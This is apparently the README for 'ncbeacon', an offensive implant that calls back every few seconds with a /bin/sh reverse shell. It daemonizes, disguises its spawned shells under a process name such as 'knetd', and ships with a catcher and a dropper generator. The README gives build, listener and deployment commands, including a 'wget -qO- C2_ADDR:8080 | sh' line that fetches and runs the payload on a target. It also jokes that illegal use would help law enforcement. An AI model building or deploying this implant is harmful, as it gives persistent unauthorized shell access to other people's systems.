A small beaconing implant meant to be caught with netcat. This was written after watching someone hack hackthebox boxes, lose his shell a few times, and have to re-exploit to get it back. All it does is call back every few seconds.
Features
- Calls back with
/bin/sh
hooked up to the TCP connection every 5 seconds - Daemonizes itself
- Dissociates the shells it spawns from the parent process
- Spawned shells have a configurable name (i.e.
argv[0]
)
For legal use only, though you'd probably be doing law enforcement a favor if you used this for illegal purposes.
- Build it (replacing the
CALLBACK_ADDRESS
with the correct address)
cc -O2 -DCBADDR=CALLBACK_ADDRESS -o ncbeacon ncbeacon.c
- Put it on target
# This one's up to you
- Set up netcat to catch it
rlwrap nc -nvlp 4444
- Start it, on target
./ncbeacon
There are a few compile-time settings controlled by macros (i.e. -DNAME=VALUE)
Macro | Required | Default | Description |
---|---|---|---|
CBADDR |
Yes | None | Callback Address |
CBPORT |
No | 4444 |
Callback Port |
CBWAIT |
No | 5 |
Time between callbacks, in seconds |
SHNAME |
No | knetd |
Name (argv[0] ) of spawned shells |
DEBUG |
No | Unset | If set, logs errors and prevents backgrounding |
One of the downsides of spawnining a new process to call back ever few seconds
is that if something accepts the connection and never closes it, the process
doesn't die. I'm looking at you OpenBSD
nc(1)
. This can be solved by using a tool
to catch the connection which closes the listening socket after accepting a
connection, such as ncat.
The included program nccatch will also happily catch a connection from ncbeacon. Build it with
cc -O2 -o nccatch nccatch.c
Give it either a port or an address and port, like ./nccatch 4444
or
./nccatch 127.0.0.1 4444
.
This is bad.
- No encryption
- No authentication
- Very frequent connection attempts
- Very regular connection attempts
- Connects up a shell to stdio (have a look at
/proc/$$/fd
)
In other words, this is pretty much only suitable for HTB and similar safe environments. Please don't use this for actual engagements unless you have a very good reason to.
The included bin2dropper.sh will generate a shell script which drops and runs a payload. It takes a payload file and writes to stdout a script which will drop the payload, run it, and remove it. Prerequisites on target are openssl and gunzip.
Example:
./bin2dropper.sh -d sneaky ./ncbeacon | nc -Nnvl 8080 # On C2 infrastructure
cd /tmp; wget -qO- C2_ADDR:8080 | sh # On target
This will use wget to grab a script which drops ./ncbeacon
to /tmp/sneaky
and runs it as sneaky
.
You can now mark off "in-memory dropper execution" on your buzzword bingo card.